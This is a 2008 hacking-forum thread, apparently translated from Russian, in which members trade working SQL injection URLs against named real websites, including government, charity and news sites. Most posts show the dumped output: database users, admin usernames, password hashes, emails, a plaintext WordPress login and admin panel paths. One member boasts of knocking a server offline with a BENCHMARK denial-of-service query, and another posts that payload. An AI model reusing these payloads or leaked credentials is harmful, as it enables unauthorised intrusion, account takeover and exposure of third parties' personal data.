SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. banned

    banned Banned

    We go into the shop... buy something =\
     
    3 people like this.
  2. fRg

    fRg Active Member

    wwf.or.id - the Indonesian office of the World Wildlife Fund
    (They have that cool label with the panda!)
    Code:
    http://www.wwf.or.id/tessonilo/Default.php?ID=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15/*&wwf_lang=1
    5.0.37:wwfdb:wwfid@localhost
     
    2 people like this.
  3. big_BRAT

    big_BRAT Elder
    Yadro banner network
    Code:
    http://web.yadro.ru/vbnstat.php3?vbnum=2+and+1=if(ascii((select+version())=0x34),1,0)--
    MySQL version 4
    // the query actually has 12 fields, and a query like ?vbnum=-2+UniOn+selEct+1,2,3,4,5,6,7,8,9,0,1,2-- goes through fine
    but I didn't manage to work it properly, since I didn't set that as a goal
    ======================
    SecurIT - information protection, information security /Zlock, Zserver programs.../
    Code:
    http://www.securit.ru/press/news/?id=-63+uNioN+selEct+1,2,3,4,concat(version(),0x3a,user(),0x3a,database()),6,7,8,9,0,1--
    5.0.45-log:[email protected]:u17160

    Code:
    http://www.securit.ru/press/news/?id=-63+uNioN+selEct+1,2,3,4,concat(table_schema,0x3a,table_name,0x3a,column_name),6,7,8,9,0,1+from+information_schema.columns+where+column_name=0x70617373776f7264+limit+0,1--
    u17160:USERS:pASSWORD
     
    #4683 big_BRAT, 7 Feb 2008
    Last edited: 7 Feb 2008
    4 people like this.
  4. ReVOLVeR

    ReVOLVeR Banned

     
    3 people like this.
  5. ~EviL~

    ~EviL~ Elder
    http://www.bulgarianbasket.com/

    HTML:
    http://www.bulgarianbasket.com/bg/news2.php?id=-11863'+UNION+SELECT+concat_ws(0x3a,version(),user(),database())/*
    4.0.24_Debian-9:[email protected]: DB10614
    (the output field is in the page title)

    HTML:
    http://www.bulgarianbasket.com/bg/news2.php?id=-11863'+UNION+SELECT+concat_ws(0x3a,username,userpass)+FROM+user/*
    vladi:7605f18a510a03c7::vladi


    http://www.hpol.org/

    HTML:
    http://www.hpol.org/transcript.php?id=-72+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5/*
    5.0.27:ro@localhost:hpol


    http://www.cbc.ca/

    HTML:
    http://www.cbc.ca/thehour/video.php?id=-1073+UNION+SELECT+null,null,null,version(),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/
    PostgreSQL 7.4.17 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 3.3.3 (SuSE Linux)
    (I had to struggle with this one :D )
     
    5 people like this.
  6. nex0

    nex0 Elder
    metallica.ru
    Code:
    http://www.metallica.ru/bbs.php3?id=999999999+union+select+convert(concat(version(),%22:%22,user(),%22:%22,database()),binary)/*
    version() 4.1.16
    user() acillatem@localhost
    database() meta2000

    iso-9001.ru
    Code:
    http://www.iso-9001.ru/index.php3?id=146+union+select+1,2,3,4,5,concat(version(),0x3a,user(),0x3a,database()),7,8,9
    version() 4.1.22
    user() so_user@localhost
    database() iso_9001

    pricenews.dp.ua

    Code:
    http://www.pricenews.dp.ua/predpr.php3?id=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1999,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34/*
    version() 5.0.27
    user() dprice@localhost
    database() price

    http://www.elitwater.ru/index.phtml?pid=99999+union+select+1,2,3,version(),5,6,7,8,9/*
    infon.ru :D
    Code:
    http://www.infon.ru/notice.phtml?nid=99999+union+select+1,convert((concat(version(),0x3a,user(),0x3a,database())),binary)
    version() 4.1.12
    user() portal_manjet@localhost
    database() portal_manjet

    sosna.ru
    Code:
    http://www.sosna.ru/index.phtml?nid=99999+union+select+1,2,3,concat(version(),0x3a,user(),0x3a,database()),5,6/*
    version() 5.0.45-log
    user() [email protected]
    database() u71952_sosna_ru

    vogss.ru
    Code:
    www.vogss.ru/print.phtml?nid=999+union+select+1,2,3/*
    version() 4.1.22-log
    user() vogss@localhost
    database() vogss

    elitwater.ru

    Code:
    http://www.elitwater.ru/index.phtml?pid=99999+union+select+1,2,3,version(),5,6,7,8,9/*
    version() 5.0.22
    user() elitwater@localhost
    database() elitwater
     
    4 people like this.
  7. ~EviL~

    ~EviL~ Elder
    gov?!

    http://epetitions.bristol.gov.uk/

    HTML:
    http://epetitions.bristol.gov.uk/petition.php?id=161+UNION+SELECT+concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14/*
    5.0.44-log:epetitioner_user@localhost:bristol_epetitioner

    HTML:
    http://epetitions.bristol.gov.uk/petition.php?id=161+UNION+SELECT+1,concat_ws(0x3a,id,username,password,email),3,4,5,6,7,8,9,10,11,12,13,14+FROM+usertemp/*
    1:mcheverton: password:[email protected]
    (http://epetitions.bristol.gov.uk/)


    http://www.pjn.gov.ar/

    HTML:
    http://www.pjn.gov.ar/getobj.php?id=-25722+UNION+SELECT+1,2,concat_ws(0x3a,version(),user(),database())/*
    5.0.38-Ubuntu_0ubuntu1-log: [email protected]:webpjn
     
    #4687 ~EviL~, 7 Feb 2008
    Last edited: 8 Feb 2008
    2 people like this.
  8. Momiji

    Momiji Elder
    intersoft.pl
    Code:
    http://www.intersoft.pl/index.php?link_id=1&lvl=1&p=31+UNION+SELECT+1,concat_ws(0x3,version(),user(),database()),3,4,5+from+mysql.user/*
    5.0.22-community-nt[email protected]intersoft
    Code:
    http://www.intersoft.pl/index.php?link_id=1&lvl=1&p=31+UNION+SELECT+1,concat_ws(0x3,version(),user(),database()),3,4,5+from+mysql.user/*

    Code:
    http://www.intersoft.pl/index.php?link_id=1&lvl=1&p=31+UNION+SELECT+1,concat_ws(0x3,id,user,pass,imie,nazwisko),3,4,5+from+admins/*
    1adminjch123JaroslawChudzik
    Admin panel: http://www.intersoft.pl/admin/
     
    4 people like this.
  9. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder
    http://specserver.com/rus/notice.asp?groupID=1+or+1=@@version--
     
    1 person likes this.
  10. big_BRAT

    big_BRAT Elder
    www.lanbilling.ru
    LANBilling billing system
    Code:
    http://www.lanbilling.ru/filedownload/download.php?action=rate&id=-12'+UnIon+SeleCt+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8/*
    5.0.26:[email protected]:lb_download
    Code:
    http://www.lanbilling.ru/filedownload/download.php?action=rate&id=-12'+UnIon+SeleCt+1,table_name,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8+from+information_schema.tables+limit+0,1/*
    interesting tables (fields):
    pafiledb_admin(admin_id,admin_username,admin_password,admin_email)
    pafiledb_license(license_id,license_name,license_text)

    1:Admin:f41b01afce262acf56b0f89b6c88b732

    ===============================
    just looked at the page source, turns out it's paFileDB 3.0, and I didn't find any info about such an injection on securitylab, :D would this count as news?)))
    ----------------
    installed the latest version of paFileDB, the trick doesn't work, intval() is already in place
     
    #4690 big_BRAT, 8 Feb 2008
    Last edited: 8 Feb 2008
    1 person likes this.
  11. Holokost

    Holokost Member

    http://www.c-ib.ru/content.php?txt=-7%20union%20select%201,2,version(),user()/*
     
    2 people like this.
  12. CraZee

    CraZee Member

    Vulns:

    Code:
    http://www.redglobe.de/index.php?option=com_ynews&Itemid=1&task=showYNews&id=-1+union+select+0,1,2,concat(username,0x3a,password),null,5,6+from+jos_users/*

    ----------------------------
    Code:
    http://www.gsv1.de/gsv_joomla/index.php?option=com_ynews&Itemid=1&task=showYNews&id=-1+union+select+0,1,2,concat(username,0x3a,password),null,5,6+from+jos_users/*
    admin:8c30df2b67d3120cb38725b59a8a12b0:FTwfwq9zdpCoVVaRvxxO4h6PKIAD0AY7
     
    4 people like this.
  13. .Begemot.

    .Begemot. Elder
    masarykovazs.eu
    Code:
    http://www.masarykovazs.eu/index.php?clanek=-155+union+select+0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),2,3,4,5,6,7,8,9,10,11/*
    masarykovazs.eu@localhost:5.0.38-Debian_1-log:masarykovazs_eu
    Code:
    http://www.masarykovazs.eu/index.php?clanek=-155+union+select+0,table_name,2,3,4,5,6,7,8,9,10,11+from+information_schema.tables/*
    Code:
    http://www.masarykovazs.eu/index.php?clanek=-155+union+select+0,column_name,2,3,4,5,6,7,8,9,10,11+from+information_schema.columns/*
    visit-palawan.com
    Code:
    http://www.visit-palawan.com/picture_gallery.php?categories=63&select_cate=63+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE())/*
    Code:
    http://www.visit-palawan.com/picture_gallery.php?categories=63&select_cate=63+union+select+0,1,concat(table_name)+from+information_schema.tables/*
    Code:
    http://www.visit-palawan.com/picture_gallery.php?categories=63&select_cate=63+union+select+0,1,column_name+from+information_schema.columns/*
    sitedefteri.com
    Code:
    http://www.sitedefteri.com/sitegit.php?id=-2833+union+select+0,1,2,3,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),5,6,7,8,9,10,11,12,13,14,15/*
    root@localhost:5.0.32-Debian_7etch3-log:linkdefteri
    Code:
    http://www.sitedefteri.com/sitegit.php?id=-2833+union+select+0,1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables/*
    Code:
    http://www.sitedefteri.com/sitegit.php?id=-2833+union+select+0,1,2,3,column_name,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.columns/*
    toy-icti.org
    Code:
    http://www.toy-icti.org/newsletter/index.php?NID=299999+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3/*
    seekwell@localhost:4.0.22-Max:SWicti-06
     
    3 people like this.
  14. 159932

    159932 Elder
    5.0.32-Debian_7etch5-log
    Forum admins:
    Admin:6689263e6df1fbd89377d1dac02f87b0:125040
    Stan:0057f84026c20b2a4cdeaf15824773bb:arowana
    -----------------------------------------------------
    5.0.45-log
    admin:5569aeb9a91a05eac4bb0186116e44c7
     
    4 people like this.
  15. sasTO

    sasTO Banned

    that's old news, try finding an injection on another site in the .mil domain ;) :D
     
    3 people like this.
  16. CaNNabi$

    CaNNabi$ Elder
    arimel:88589699a8524d14a7fafc60a18f7644:[email protected]

    Path to the admin panel http://www.cristianos.com/wp-login.php
    login arimel
    pass anika@99

    I think I formatted everything correctly) it's just my first time in this section) so don't kick me :) , if anything's wrong tell me and I'll fix it ; )
     
    2 people like this.
  17. satana8920

    satana8920 Antichat Executioner
    HTML:
    http://kaleydoskop.com.ua/index.php?plugin=katalog&do=showUserContent&type=firms&id=index.php?plugin=katalog&do=showUserContent&type=tovars&id=-395'+union+select+1,2,3,4,5,concat_ws(0x3a3a,id,login,pwd,email),7,8,9,10,11,12,13,14,15,16,17,18+from+mix_users+limit+1,1/*
    11::administrator::070670bb5da95b97f378e4b1a5a954da::[email protected]

    HTML:
    http://www.sahm.com.ua/index.php?plugin=photogall&do=exposure&path=product&parent=49'+union+select+1,2,3,concat_ws(0x3a3a,id,login,pwd,email),5,6,7,8,9,10,11,12+from+ng_users/*&cat=11
    12::admin::670266c7724d26d023f1326f1020e919::[email protected]
    11::administrator::670266c7724d26d023f1326fb070c1d0::[email protected]
     
    1 person likes this.
  18. nex0

    nex0 Elder
    a batch of SQL injections

    activision2007.es (site of the Spanish Activision)
    Code:
    http://www.activision2007.es/juego.php?jid=-125+union+select+1,2,convert(concat(version(),0x3a,user(),0x3a,database()),binary),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38
    version() 4.1.18-nt :mad: :mad: :mad:
    user() DBActivision27@localhost
    database() gestion

    the usuario table has ~75000 users!!! (found out using limit)
    with difficulty found the columns id, nombre, email......
    Code:
    http://www.activision2007.es/juego.php?jid=-125+union+select+1,2,3,convert(concat(id,0x3a,nombre,0x3a,email),binary),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+usuario+limit+0,100000
    I couldn't find the column with passwords =// so give it a try
    p.s. then I got angry and sent the server into a deep DoS with benchmark/ (it's been down for about 5 hours already)

    ardana.ru
    Code:
    http://www.ardana.ru/products/product.php?gid=-1+union+select+1,2,3,4,concat(version(),0x3a,user(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
    version() 4.1.22-standard
    user() ardana_ardana@localhost
    database() ardana_ardana

    otvet.su
    Code:
    http://www.otvet.su/tovar.php?gid=999999+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
    version() 5.0.24-standard
    user() otvet1@localhost
    database() db_otvet1

    abandoneer.com
    Code:
    http://abandoneer.com/games.php?gameid=99999999/**/union/**/select/**/1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
    version() 4.1.21-log
    user() evilrafael@localhost
    database() evilrafael
     
    1 person likes this.
  19. CaNNabi$

    CaNNabi$ Elder
    Code:
    http://www.sahm.com.ua/index.php?plugin=photogall&do=exposure&path=product&parent=49'+union+select+1,2,3,concat_ws(0x3a3a,version(),user(),database()),5,concat_ws(0x3a3a,version(),user(),database()),7,8,9,10,11,12/*&cat=11users%20id::login::pwd::email
    4.1.20::sahm_user1@localhost::sahm_db


    Code:
    http://www.dharmahealing.org/index.php?option=com_awesom&Itemid=S@BUN&task=viewlist&listid=-1/**/union/**/select/**/null,concat(username,0x3a,password),null,null,null,null,null,null,null/**/from/**/mos_users/*
    supercristal:bdbfdaa664e59fd3f2ef5a51f0688e10


    Code:
    http://sacredaeon.com/index.php?option=com_awesom&Itemid=S@BUN&task=viewlist&listid=-1/**/union/**/select/**/null,concat(username,0x3a,password),null,null,null,null,null,null,null/**/from/**/mos_users/*
    supercristal:e5fe262def0b72b051d9d11301cde9b9

    Code:
    http://www.torcidaforcajovem.net/index.php?option=com_musepoes&task=answer&Itemid=s@bun&catid=s@bun&aid=-1/**/union/**/select/**/0,username,password,0x3a,0x3a,3,0,0x3a,0,4,4,4,0,0x3a,0,5,5,5,0,0x3a/**/from/**/mos_users/*
    admin:a1c3c4ff7c9a2064f788db3eb8a5fb49


    Code:
    http://www.xcsport.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
    b983:6e321306ec723a50ee62d01f21638bb2f72e4592


    Code:
    http://www.rusquilt.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
    7ae1:3dc58f7e1db2d269fadf0f519315f264db969552

    Now let's try a second time; if hashes are supposed to be posted decrypted then my bad, I'd just already seen them posted here undecrypted (of course I tried to decrypt them), once again I ask you not to kick me if something's wrong) I'll fix it)
     
    #4699 CaNNabi$, 9 Feb 2008
    Last edited: 10 Feb 2008
  20. Велемир

    Um... And why convert specifically? (I wanted to check). The server is alive again, by the way :PP.

    http://www.activision2007.es/juego.php?jid=-125+BENCHMARK(10000000,BENCHMARK(10000000,md5(current_date)))/* (Didn't work :P).

    P.S. Honestly don't know where to post this =____=. Posted it here since it's addressed to the author =_______=
     
    #4700 Велемир, 10 Feb 2008
    Last edited: 10 Feb 2008